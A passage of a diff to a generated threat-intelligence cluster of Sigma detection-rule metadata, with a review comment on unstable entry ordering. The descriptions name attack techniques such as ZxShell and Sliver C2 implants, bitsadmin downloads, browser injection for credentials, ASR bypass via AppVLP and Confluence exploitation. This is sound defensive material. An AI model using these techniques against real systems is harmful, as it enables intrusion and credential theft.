"filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "filename": "proc_creation_win_apt_muddywater_dnstunnel.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + "https://www.vmray.com/analyses/5ad401c3a568/report/overview.html", + "https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml" ], "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.command_and_control", + "attack.t1071.004" ] }, - "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "value": "Turla Group Commands May 2020" - }, - { - "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_unc2452_cmds.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f", - "value": "UNC2452 Process Creation Patterns" - }, - { - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in 
Microsoft and Symantec reports", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_unc2452_ps.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", - "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" - ] - }, - "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c", - "value": "UNC2452 PowerShell Pattern" - }, - { - "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. 
The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", - "meta": { - "author": "@41thexplorer, Microsoft Defender ATP", - "creation_date": "2018/11/20", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_apt_unidentified_nov_18.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/DrunkBinary/status/1063075530180886529", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218.011" - ] - }, - "uuid": "7453575c-a747-40b9-839b-125a0aae324b", - "value": "Unidentified Attacker November 2018" - }, - { - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "meta": { - "author": "Florian Roth, Markus Neis", - "creation_date": "2020/02/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ] - }, - "uuid": "3121461b-5aa0-4a41-b910-66d25524edbb", - "value": "Winnti Malware HK University Campaign" - }, - { - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "meta": { - "author": "Florian Roth, oscd.community", - "creation_date": "2020/07/30", - "falsepositive": [ - "Legitimate setups that use similar flags" - ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml", - "level": "critical", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" - ] - }, - "uuid": "73d70463-75c9-4258-92c6-17500fe972f2", - "value": "Winnti Pipemon Characteristics" - }, - { - "description": "Detects activity mentioned in Operation Wocao report", - "meta": { - "author": "Florian Roth, frack113", - "creation_date": "2019/12/20", - "falsepositive": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" - ], - "filename": "proc_creation_win_apt_wocao.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", - "https://twitter.com/SBousseaden/status/1207671369963646976", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" - ] - }, - "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", - "value": "Operation Wocao Activity" - }, - { - "description": "Detects a ZxShell start by the called and well-known function name", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2017/07/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_apt_zxshell.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" - ] - }, - "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", - "value": "ZxShell Malware" - }, - { - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "meta": { - "author": "Sreeman", - "creation_date": "2020/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml" - ], - "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" - ] - }, - "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", - "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" - }, - { - "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/07", - "falsepositive": [ - "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" - ], - "filename": "proc_creation_win_archiver_iso_phishing.yml", - "level": "high", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/1ZRR4H/status/1534259727059787783", - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566" - ] - }, - "uuid": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", - "value": "Phishing Pattern ISO in Archive" - }, - { - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/03/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_asr_bypass_via_appvlp_re.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml" - ], - "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" - ] - }, - "uuid": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", - "value": "Using AppVLP To Circumvent ASR File Path Rule" - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/09/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", - 
"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", - "https://github.com/h3v0x/CVE-2021-26084_Confluence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" - ] - }, - "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", - "value": "Atlassian Confluence CVE-2021-26084" + "uuid": "36222790-0d43-4fe8-86e4-674b27809543", + "value": "DNS Tunnel Technique from MuddyWater" }, { "description": "Detects usage of attrib.exe to hide files from users.", 
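Review bot: The new-side entries in this hunk (Uninstall Sysinternals Sysmon, Dism Remove Online Package, DNS Tunnel Technique from MuddyWater) land between "Sofacy Trojan Loader Activity" and "Hiding Files with Attrib.exe", replacing a run that the old side kept in `meta.filename` order (proc_creation_win_apt_sourgrum … proc_creation_win_atlassian_confluence_cve_2021_26084_exploit), so the generator's output order appears to be non-deterministic and every regeneration will rewrite hundreds of lines, as the 501-to-78 hunk here shows. Sorting entries by a stable key before writing the cluster, e.g. `sorted(entries, key=lambda e: e["meta"]["filename"])` or by `value`, would keep diffs reviewable and make genuine additions and removals visible. Separately, this hunk drops cluster entries together with their `uuid` values (SOURGUM Actor Behaviours, Turla Group Lateral Movement, Atlassian Confluence CVE-2021-26084 and others); if they are not re-emitted elsewhere in the same commit, any galaxy or MISP instance that references those UUIDs loses its target, so the removal should be deliberate and stated rather than a side effect of regeneration. The hunk ends inside the attrib.exe entry, so that object continues outside the hunk.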
@@ -35011,1982 +31089,29 @@ "value": "Hiding Files with Attrib.exe" }, { - "description": "Marks a file as a system file using the attrib.exe utility", - "meta": { - "author": "frack113", - "creation_date": "2022/02/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_attrib_system.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "value": "Set Windows System File with Attrib" - }, - { - "description": "Detects usage of attrib with \"+s\" option to set suspicious script or executable as system files to hide them from users and make them unable to delete with simple rights. 
The rule limit the search to specific extensions and directories to avoid FP's", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_attrib_system_susp_paths.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4", - "https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ] - }, - "uuid": "efec536f-72e8-4656-8960-5e85d091345b", - "value": "Set Suspicious Files as System Files Using Attrib" - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_automated_collection.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" - ] - }, - "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", - "value": "Automated Collection Command Prompt" - }, - { - "description": "Detects attackers using tooling with bad opsec defaults e.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run, one trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.", - "meta": { - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard", - "creation_date": "2020/10/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_bad_opsec_sacrificial_processes.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", - "https://www.cobaltstrike.com/help-opsec", - "https://twitter.com/CyberRaiju/status/1251492025678983169", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool", - "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "a7c3d773-caef-227e-a7e7-c2f13c622329", - "value": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments" - }, - { - "description": "Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets", - "meta": { - "author": "pH-T", - "creation_date": "2022/05/31", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_invoke_susp_cmdlets.yml", - "level": "high", - "logsource.category": "process_creation", 
- "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "fd6e2919-3936-40c9-99db-0aa922c356f7", - "value": "Malicious Base64 Encoded Powershell Invoke Cmdlets" - }, - { - "description": "Detects base64 encoded listing Win32_Shadowcopy", - "meta": { - "author": "Christian Burkard", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_listing_shadowcopy.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "47688f1b-9f51-4656-b013-3cc49a166a36", - "value": "Base64 Encoded Listing of Shadowcopy" - }, - { - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "meta": { - "author": "Christian Burkard, pH-T", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_base64_reflective_assembly_load.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027", - "attack.t1620" - ] - }, - "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "value": "Base64 Encoded Reflective Assembly Load" - }, - { - "description": "Detects usage of bitsadmin downloading a file", - "meta": { - "author": "Michael Haag, FPT.EagleEye", - "creation_date": "2017/03/09", - "falsepositive": [ - "Some legitimate apps use this, but limited." - ], - "filename": "proc_creation_win_bitsadmin_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" - ] - }, - "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "value": "Bitsadmin Download" - }, - { - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/06/28", - "falsepositive": [ - "Some legitimate apps use this, but limited." 
- ],
- "filename": "proc_creation_win_bitsadmin_download_susp_domain.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://isc.sans.edu/diary/22264",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1197",
- "attack.s0190",
- "attack.t1036.003"
- ]
- },
- "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c",
- "value": "Bitsadmin Download from Suspicious Domain"
- },
- {
- "description": "Detects usage of bitsadmin downloading a file with a suspicious extension",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://isc.sans.edu/diary/22264",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1197",
- "attack.s0190",
- "attack.t1036.003"
- ]
- },
- "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200",
- "value": "Bitsadmin Download File with Suspicious Extension"
- },
- {
- "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_bitsadmin_download_susp_ip.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://isc.sans.edu/diary/22264",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1197",
- "attack.s0190",
- "attack.t1036.003"
- ]
- },
- "uuid": "99c840f2-2012-46fd-9141-c761987550ef",
- "value": "Bitsadmin Download File from IP"
- },
- {
- "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://isc.sans.edu/diary/22264",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1197",
- "attack.s0190",
- "attack.t1036.003"
- ]
- },
- "uuid": "2ddef153-167b-4e89-86b6-757a9e65dcac",
- "value": "Bitsadmin Download to Suspicious Target Folder"
- },
- {
- "description": "Detects usage of bitsadmin downloading a file to uncommon target folder",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/28",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://isc.sans.edu/diary/22264",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.persistence",
- "attack.t1197",
- "attack.s0190",
- "attack.t1036.003"
- ]
- },
- "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248",
- "value": "Bitsadmin Download to Uncommon Target Folder"
- },
- {
- "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.",
- "meta": {
- "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
- "creation_date": "2019/10/24",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_bootconf_mod.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
- "https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1490"
- ]
- },
- "uuid": "1444443e-6757-43e4-9ea4-c8fc705f79a2",
- "value": "Modification of Boot Configuration"
- },
- {
- "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks",
- "meta": {
- "author": "pH-T, Nasreddine Bencherchali (update)",
- "creation_date": "2022/07/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_browser_remote_debugging.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf",
- "https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1185"
- ]
- },
- "uuid": "b3d34dc5-2efd-4ae3-845f-8ec14921f449",
- "value": "Browser Started with Remote Debugging"
- },
- {
- "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash",
- "meta": {
- "author": "Markus Neis, Florian Roth",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_bypass_squiblytwo.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html",
- "https://twitter.com/mattifestation/status/986280382042595328",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1047",
- "attack.t1220",
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
- ]
- },
- "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea",
- "value": "SquiblyTwo Execution"
- },
- {
- "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants",
- "meta": {
- "author": "Nasreddine Bencherchali, Florian Roth",
- "creation_date": "2022/08/25",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_c2_sliver.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059"
- ]
- },
- "uuid": "42333b2c-b425-441c-b70e-99404a17170f",
- "value": "Sliver C2 Implant Activity Pattern"
- },
- {
- "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.",
- "meta": {
- "author": "Alfie Champion (ajpc500)",
- "creation_date": "2021/06/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_c3_load_by_rundll32.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "uuid": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f",
- "value": "F-Secure C3 Load by Rundll32"
- },
- {
- "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.",
+ "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.",
 "meta": {
 "author": "Austin Songer @austinsonger",
- "creation_date": "2021/10/23",
+ "creation_date": "2021/11/05",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "proc_creation_win_certoc_execution.yml",
+ "filename": "proc_creation_win_susp_registration_via_cscript.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20",
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2",
- "https://lolbas-project.github.io/lolbas/Binaries/Certoc/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_execution.yml"
+ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20",
+ "https://ss64.com/vb/cscript.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml"
 ],
 "tags": [
 "attack.defense_evasion",
 "attack.t1218"
 ]
 },
- "uuid": "242301bc-f92f-4476-8718-78004a6efd9f",
